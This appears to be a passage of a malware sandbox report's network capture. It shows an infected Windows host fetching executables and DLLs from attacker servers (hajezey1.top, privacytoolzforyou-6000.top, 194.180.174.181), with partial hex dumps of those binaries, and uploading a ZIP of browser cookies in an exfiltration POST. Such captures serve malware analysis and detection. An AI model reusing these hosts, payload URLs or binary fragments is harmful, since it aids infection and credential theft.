                                                                                                                          Oct 29, 2021 17:07:26.390717983 CEST10865INData Raw: 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: @B
                                                                                                                          Oct 29, 2021 17:07:26.390731096 CEST10867INData Raw: e8 42 1c 09 00 83 ec 0c 85 c0 89 c5 0f 85 5a ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 21 1c 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 fa 1b 09 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc
                                                                                                                          Data Ascii: BZ|$D$4$!|$D$4$|$D$4$s|$D$4$'aT$$tL$(D$ M&T$T$U=at9$a`aQtD$
                                                                                                                          Oct 29, 2021 17:07:33.695772886 CEST12635OUTGET //l/f/9Z2CynwB3dP17SpzOnMI/ffdc8614f62a76a5c7889757f570f02f455435ee HTTP/1.1
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Host: 194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:33.947238922 CEST12637INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:33 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2828315
                                                                                                                          Connection: keep-alive
                                                                                                                          Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
                                                                                                                          ETag: "612fa893-2b281b"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8 b5 4e a5 3e 11 54 3f 57 4d ea 16 11 b1 29 39 42 d6 86 ce a3 f6 8e bf 00 9e ec 07 96 d8 0f 1c 6d 56 57 b4 9a 9b 8b bb ed 07 62 80 36 7b e5 11 7c 21 da 0f bc 08 ef d4 4f ec 07 12 01 4d 1a 89 8a e5 3e d6 3e c3 24 5c 2e 25 d4 d7 4c d2 88 7a 46 93 6c d0 a5 f6 03 33 9a 95 9d 01 b3 7c 08 b0 30 23 2a 4e 2b ee b7 1f 38 c4 9b e7 35 db 0f c0 ef 4e af e8 8a 55 34 2b 62 80 15 66 53 ff 03 32 3a 63 f6 8e 1f 03 7a e5 b6 04 c0 31 43 a9 1f 92 b6 da 0f 40 41 cd 9d 5a f8 26 b5 d6 a1 f6 95 77 6f 13 d5 d7 e2 16 fb 81 c3 00 52 40 04
                                                                                                                          Data Ascii: PKznN<{rinssdbm3.dll|8NY6$J$1D a.jLVCN;}/$Z,TRqcEc=;{sp`A?MW!a?N~eAWo[},;+\Jw|k<yR^Eonxsc=V,FcuwO[u{<w7P{K~Ewcz^[Z6GV2+n41M.w{fnJL{ dM+ /)$X!LK`MwILA8rIXr87}<]rTWmb6/_aWlB3n_joMz_Q8K*grL*H.v6[*4I{1g<>M$G&Y-O9\,tWmX Y3*S<#}">0RBg,lh.sorp8)3Kvdsn3+]+krMu_Y\/8T&BC"u;ek u$~`{!M\WY37+nQZ*3\G5dZhVLZ|k5XFYlVVWC|b\Zm 0PF8{]UpRW,nMMs_@>Q N>T?WM)9BmVWb6{|!OM>>$\.%LzFl3|0#*N+85NU4+bfS2:cz1C@AZ&woR@
                                                                                                                          Oct 29, 2021 17:07:34.864865065 CEST15574OUTPOST / HTTP/1.1
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
                                                                                                                          Content-Length: 1409
                                                                                                                          Host: 194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:34.864895105 CEST15575OUTData Raw: 60 d9 e4 02 f8 cd eb 02 44 9a 42 0d 0a 2d 2d 76 44 32 74 4c 31 71 43 39 62 43 33 7a 56 39 65 44 39 79 58 38 64 55 38 79 59 38 6c 43 31 63 56 0d 0a 63 6f 6e 74 65 6e 74 2d 64 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e
                                                                                                                          Data Ascii: `DB--vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVcontent-disposition: form-data; name="9Z2CynwB3dP17SpzOnMI"; filename="9Z2CynwB3dP17SpzOnMI.zip"Content-Type: application/octet-streamPK]SXVQ*browsers/cookies/Google
                                                                                                                          Oct 29, 2021 17:07:35.174335957 CEST15592INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:35 GMT
                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Data Raw: 32 38 0d 0a 63 64 33 61 36 32 62 35 62 62 36 38 65 39 37 31 34 65 35 61 64 31 39 62 66 36 37 31 31 30 62 65 36 37 30 37 30 31 31 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 28cd3a62b5bb68e9714e5ad19bf67110be670701170


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.749837162.159.134.233443C:\Users\user\AppData\Local\Temp\3113.exe
                                                                                                                          TimestampkBytes transferredDirectionData


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          6192.168.2.749750185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:13.703707933 CEST1164OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://nbqwgqd.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 166
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:13.703725100 CEST1164OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 29 bc 82 03
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d)2N"V|NBHVPk&]u!EHQb8"!qK^:Ja?:F[e^J!
                                                                                                                          Oct 29, 2021 17:06:13.782012939 CEST1165INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:13 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 11 b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 19{i+,GO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          7192.168.2.749752185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:14.135543108 CEST1175OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://tkdnntfgka.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 276
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:14.135998964 CEST1175OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 1f b0 c3 36
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d6u5`zX]y9rz/US 41aJ*$49=Q3yrEjtwy;!]dtmVs(vCpp,x^{Fz:F3{7}9ZrB"]
                                                                                                                          Oct 29, 2021 17:06:14.211994886 CEST1175INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:14 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 46I:82OOj{CUg%EQAc}yc0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          8192.168.2.749753185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:14.650727987 CEST1176OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Host: privacytoolzforyou-6000.top
                                                                                                                          Oct 29, 2021 17:06:14.793245077 CEST1178INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:14 GMT
                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                          Last-Modified: Fri, 29 Oct 2021 15:06:02 GMT
                                                                                                                          ETag: "54a00-5cf7f2a5f3208"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 346624
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 34 de 0b c3 70 bf 65 90 70 bf 65 90 70 bf 65 90 1f c9 ce 90 5c bf 65 90 1f c9 fb 90 52 bf 65 90 1f c9 cf 90 f0 bf 65 90 79 c7 f6 90 77 bf 65 90 70 bf 64 90 0f bf 65 90 1f c9 ca 90 71 bf 65 90 1f c9 ff 90 71 bf 65 90 1f c9 f8 90 71 bf 65 90 52 69 63 68 70 bf 65 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 9d 79 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 03 00 00 c4 70 02 00 00 00 00 50 c8 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 25 ea 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 cc 03 00 50 00 00 00 00 60 73 02 68 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 90 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 bc 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c8 03 00 00 10 00 00 00 c8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 78 69 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 3f 00 00 00 60 73 02 00 40 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 23 01 00 00 a0 73 02 00 24 01 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$4pepepe\eReeywepdeqeqeqeRichpePELy_pP@t%P`sh?s0@.text `.dataio@.noxiPs@.rsrch?`s@@@.reloc#s$&@B
                                                                                                                          Oct 29, 2021 17:06:14.793278933 CEST1179INData Raw: f0 ce 03 00 0c cf 03 00 1a cf 03 00 26 cf 03 00 32 cf 03 00 4a cf 03 00 68 cf 03 00 82 cf 03 00 94 cf 03 00 b0 cf 03 00 c8 cf 03 00 d6 cf 03 00 ea cf 03 00 f8 cf 03 00 12 d0 03 00 26 d0 03 00 36 d0 03 00 52 d0 03 00 62 d0 03 00 74 d0 03 00 8c d0
                                                                                                                          Data Ascii: &2Jh&6Rbt,>Pfv*BRh":Pbp
                                                                                                                          Oct 29, 2021 17:06:14.793301105 CEST1180INData Raw: 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 72 00 61 00 69 00 73 00 65 00 00 00 72 00 75 00 6e 00 74 00 69 00 6d 00 65 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 00 00 00 00 0d 00 0a 00 00 00 00 00 54 00 4c 00 4f 00 53 00 53 00 20 00 65 00 72 00
                                                                                                                          Data Ascii: ", 0)raiseruntime error TLOSS errorSING errorDOMAIN errorR6033- Attempt to use MSIL code from this
                                                                                                                          Oct 29, 2021 17:06:14.793318033 CEST1182INData Raw: 0a 00 2d 00 20 00 70 00 75 00 72 00 65 00 20 00 76 00 69 00 72 00 74 00 75 00 61 00 6c 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 63 00 61 00 6c 00 6c 00 0d 00 0a 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 34 00 0d 00 0a 00
                                                                                                                          Data Ascii: - pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console
                                                                                                                          Oct 29, 2021 17:06:14.793339014 CEST1183INData Raw: 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 5b 00 30 00 5d 00 29 00 29 00 2c 00 20 00 4c 00 22 00 5c 00 6e 00 5c 00 6e 00 22 00 29 00 00 00 2e 00 2e 00 2e 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00
                                                                                                                          Data Ascii: sizeof(outmsg[0])), L"\n\n")...wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)<program name unknown>wcscp
                                                                                                                          Oct 29, 2021 17:06:14.793360949 CEST1185INData Raw: 00 00 00 00 00 ac eb 3f 00 00 00 00 00 4e eb 3f 00 00 00 00 00 4e eb 3f 00 00 00 00 00 f2 ea 3f 00 00 00 00 00 f2 ea 3f 00 00 00 00 00 98 ea 3f 00 00 00 00 00 98 ea 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 42 ea 3f 00 00 00 00 00 ec e9 3f 00 00
                                                                                                                          Data Ascii: ?N?N?????B?B?????H?H?????b?b???????F?F??
                                                                                                                          Oct 29, 2021 17:06:14.793380976 CEST1186INData Raw: a4 3f 88 e9 d7 3f 89 f2 43 67 f9 af 3f 3d 00 30 89 8a d3 98 d8 3f 57 2f 1e 07 66 f6 31 3d 00 60 03 28 04 4a d9 3f 44 6b 8c b0 bc e7 30 3d 00 68 bf f4 23 f1 d9 3f 1f 40 f2 15 20 89 36 3d 00 80 db ab fc 99 da 3f 11 a3 87 5f 9c e8 11 3d 00 88 14 7c
                                                                                                                          Data Ascii: ??Cg?=0?W/f1=`(J?Dk0=h#?@ 6=?_=|D?&?4j<='?Qn&=?l=6?DX,4=?-Q2=xbt?WE<.l?7w,=?l>=%?Nl,"=@\r??t8=85R
                                                                                                                          Oct 29, 2021 17:06:14.793405056 CEST1187INData Raw: 58 68 b7 3f 2c e4 6e 40 34 60 ed 3c 00 b0 e6 24 9e a8 b7 3f db d1 1c ef f1 05 e7 3c 00 b6 6e 1c e5 e8 b7 3f fe 94 39 f0 dc ae df 3c 00 ad 00 97 2d 29 b8 3f 07 5c aa 9d bb bf c4 3c 00 d6 c5 98 77 69 b8 3f e0 a1 e9 e5 11 3d ef 3c 00 52 e8 25 c3 a9
                                                                                                                          Data Ascii: Xh?,n@4`<$?<n?9<-)?\<wi?=<R%?f@<*B?aw<G^*?m(<<2;j?PE<?</<:T?Ft<+?NibzP<l? %X<aY?]@_}<nL?G<1-
                                                                                                                          Oct 29, 2021 17:06:14.793431044 CEST1189INData Raw: e3 3c 00 40 cc 93 d9 9c cc 3f 1a ad c8 1c ee 45 ea 3c 00 56 4f 75 7f de cc 3f 21 53 97 c3 80 58 f4 3c 00 0f 62 11 2d 20 cd 3f 43 b2 3a 92 07 e1 f6 3c 00 c0 10 7c e2 61 cd 3f 42 ae 3c af b0 24 fb 3c 00 e7 7b c9 9f a3 cd 3f 2b 58 ea a9 55 47 e9 3c
                                                                                                                          Data Ascii: <@?E<VOu?!SX<b- ?C:<|a?B<$<{?+XUG<me?>U<o]2'?I<i?G<o? n<9[?|^<.?>oj<._p?1S<X?l<~?o.x<%3d?{=
                                                                                                                          Oct 29, 2021 17:06:14.793454885 CEST1190INData Raw: 8d 1e 0a c9 f0 52 00 3d 00 6c 5b e0 f2 5d e2 3f 1e cc 24 c5 9c 69 10 3d 00 77 2f b3 64 aa e2 3f be f8 1d b8 43 83 1b 3d 00 9a 28 c9 4f f7 e2 3f 75 82 bc 31 e4 dd 1b 3d 00 9a 85 2f b8 44 e3 3f 05 12 20 ba 19 26 1d 3d 00 b7 87 20 a2 92 e3 3f 69 fe
                                                                                                                          Data Ascii: R=l[]?$i=w/d?C=(O?u1=/D? &= ?iC1]<Ei?X=g<P~0?Y;= ]?m<?A8y<7l ?S6==.q?+`=?%!5=oh?y=iQi?v7=?dDR
                                                                                                                          Oct 29, 2021 17:06:14.847397089 CEST1192INData Raw: e9 87 8c 97 ef 3f 56 9f b4 f3 f3 94 ef 3f 08 25 11 0d 53 92 ef 3f 56 a9 ea d1 a9 8f ef 3f df 96 25 40 f8 8c ef 3f 08 04 9f 55 3e 8a ef 3f 32 aa 2c 10 7c 87 ef 3f d0 dc 9c 6d b1 84 ef 3f 56 80 b6 6b de 81 ef 3f 06 01 39 08 03 7f ef 3f 98 49 dc 40
                                                                                                                          Data Ascii: ?V?%S?V?%@?U>?2,|?m?Vk?9?I@|?P3y??}>v?H|As?#<p?_0.m?tj?f?c?3)`?i]?F)Z?2VV?f\S?B?}4P?VL?{fI?uSE?|uB?1<>?(b


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          9192.168.2.749754185.98.87.15980C:\Windows\explorer.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:06:16.974819899 CEST1537OUTPOST / HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://ebdlywmw.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 152
                                                                                                                          Host: hajezey1.top
                                                                                                                          Oct 29, 2021 17:06:16.977236032 CEST1537OUTData Raw: 10 87 f2 e3 6d 81 a1 c4 ce 4d 79 35 76 cd 96 fe 47 13 a8 45 a7 4c 69 91 cc e6 a9 f3 88 d3 e1 82 1a c1 2c d2 1d 1d ce e3 ed df f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 2e 9e a9 7b
                                                                                                                          Data Ascii: mMy5vGELi,wmwu$f]d.{0xfooi%Mw<LarI<BUz,u)6}>e=4
                                                                                                                          Oct 29, 2021 17:06:17.052582979 CEST1538INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.20.1
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:17 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
